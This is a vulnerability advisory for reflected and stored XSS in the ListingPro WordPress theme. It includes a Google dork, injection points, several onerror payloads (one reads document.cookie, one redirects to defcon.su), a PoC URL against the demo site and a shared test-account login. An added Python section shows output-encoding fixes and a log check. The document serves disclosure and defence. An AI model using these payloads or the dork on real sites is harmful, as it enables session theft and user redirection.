ListingPro - WordPress Directory Theme v2.0.14.2 Reflected & Persistent XSS

2019.11.29
SubversA (RU)
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: ListingPro - WordPress Directory Theme v2.0.14.2 Reflected & Persistent XSS
# Google Dork: /wp-content/themes/listingpro/
# Date: 29/11/2019
# Exploit Author: SUBVΞRSΛ
# Vendor Homepage: https://listingprowp.com/beta/
# Software Link: https://themeforest.net/item/listingpro-multipurpose-directory-theme/19386460
# Version: 2.0.14.2 [ 12.563 Sales ]
# Tested on: Parrot OS
# CVE : -
# CWE : 79

----[]- Reflected XSS: -[]----

Use your payload inside the «What» input field on the homepage ( https://classic.listingprowp.com/ ) and then submit the form; the payload will be triggered.

Payload Sample #0: <!--<img src="--><img src=x onerror=(alert)(document.cookie)//">
Payload Sample #1: "><img src=x onerror=alert(`SUBVΞRSΛ`)>

PoC Link: https://classic.listingprowp.com/?select=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%60SUBV%CE%9ERS%CE%9B%60%29%3E&lp_s_loc=&lp_s_tag=&lp_s_cat=&s=home&post_type=listing

----[]- Persistent XSS: -[]----

You need a new basic user account (register your own or use mine: kadajik5554913/hYWeOJdr5Mqe), then go to the https://classic.listingprowp.com/submit-listing/ page to submit a new listing. Choose the «Free» plan and press the «Continue» button. On the next page choose any category; after that you'll see the vulnerable input fields «Best Day/Night» and «Good For» (for some categories you'll see only one vulnerable input field: «Good For»). Use your payload inside the vulnerable input field(s) and save your listing.

Payload Sample #0: "><img src=x onerror=alert(document.cookie)>
Payload Sample #1: "><img src=x onerror=window.location.replace(`http://defcon.su`)>

PoC: log in as kadajik5554913/hYWeOJdr5Mqe (login/password) and go to the https://classic.listingprowp.com/?post_type=listing&p=18417 page.
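Both findings share one root cause: user-controlled text (the `select` search parameter in the reflected case, the saved «Best Day/Night» / «Good For» fields in the persistent case) is written into HTML without context-appropriate encoding. The Python below is an added illustration, not code from the advisory or from the ListingPro theme: the template strings are constructed stand-ins for the theme's markup, and the access-log check is an assumed detection rule, not anything the advisory describes. It renders the advisory's own payloads through a vulnerable and a fixed template, parses the result the way a browser would to show where an `onerror` handler actually lands, and flags the PoC URL from a request log.

```python
"""Added example: output-encoding fix and a log check for the two XSS findings.
The markup below is a constructed stand-in for the theme's templates."""
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlparse

# Payloads exactly as quoted in the advisory.
REFLECTED_PAYLOAD = '"><img src=x onerror=alert(`SUBVΞRSΛ`)>'
STORED_PAYLOAD = '"><img src=x onerror=alert(document.cookie)>'
# PoC link from the advisory's reflected-XSS section.
POC_URL = ("https://classic.listingprowp.com/?select=%22%3E%3Cimg+src%3Dx+onerror"
           "%3Dalert%28%60SUBV%CE%9ERS%CE%9B%60%29%3E&lp_s_loc=&lp_s_tag=&lp_s_cat="
           "&s=home&post_type=listing")


def render_search_box_vulnerable(what: str) -> str:
    """Constructed stand-in for the search form: the value is concatenated
    straight into an attribute, so a leading '">' closes the attribute and
    the tag, and everything after it is parsed as new markup."""
    return f'<input type="text" name="select" value="{what}">'


def render_search_box_fixed(what: str) -> str:
    """Same markup with attribute-context encoding (html.escape(quote=True),
    the equivalent of WordPress esc_attr()). '"' becomes &quot; and '<'
    becomes &lt;, so the browser never leaves the attribute value."""
    return f'<input type="text" name="select" value="{html.escape(what, quote=True)}">'


def render_listing_field_fixed(stored_value: str) -> str:
    """Persistent case: the value comes from the database instead of the URL,
    but the rule is the same: encode for the output context at render time
    (text-node context here; html.escape covers it)."""
    return f'<span class="good-for">{html.escape(stored_value, quote=True)}</span>'


class _EventHandlerFinder(HTMLParser):
    """Collects every element carrying an on* event-handler attribute, i.e.
    what a browser would actually execute from the rendered page."""

    def __init__(self) -> None:
        super().__init__()
        self.hits: list[tuple[str, str]] = []

    def handle_starttag(self, tag, attrs):
        for name, _value in attrs:
            if name.lower().startswith("on"):
                self.hits.append((tag, name.lower()))


def injected_handlers(markup: str) -> list[tuple[str, str]]:
    """Parse rendered HTML and return (tag, handler-attribute) pairs that
    ended up as real markup rather than as inert attribute text."""
    finder = _EventHandlerFinder()
    finder.feed(markup)
    finder.close()
    return finder.hits


# Detection side (assumed rule, not from the advisory): a search request
# whose decoded `select` parameter contains tag or handler markers.
SUSPICIOUS_MARKERS = ("<", ">", "onerror", "onload", "javascript:")


def search_param_looks_like_xss(url: str, param: str = "select") -> bool:
    """True when the named query parameter of a logged request URL decodes to
    something containing markup markers. parse_qs does the URL-decoding."""
    values = parse_qs(urlparse(url).query).get(param, [])
    return any(m in v.lower() for v in values for m in SUSPICIOUS_MARKERS)


if __name__ == "__main__":
    print("vulnerable:", injected_handlers(render_search_box_vulnerable(REFLECTED_PAYLOAD)))
    print("fixed:     ", injected_handlers(render_search_box_fixed(REFLECTED_PAYLOAD)))
    print("stored fix:", injected_handlers(render_listing_field_fixed(STORED_PAYLOAD)))
    print("PoC URL flagged:", search_param_looks_like_xss(POC_URL))
```

Run as a script it shows an `('img', 'onerror')` element surviving the vulnerable render and none after encoding, and the PoC URL being flagged. Note that sanitising the stored listing fields on save (for example with `sanitize_text_field()`) is a useful second layer, but it does not replace encoding at output, because the same value may later be rendered in an attribute, a text node or a JavaScript string, each of which needs different encoding.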


Copyright 2019, cxsecurity.com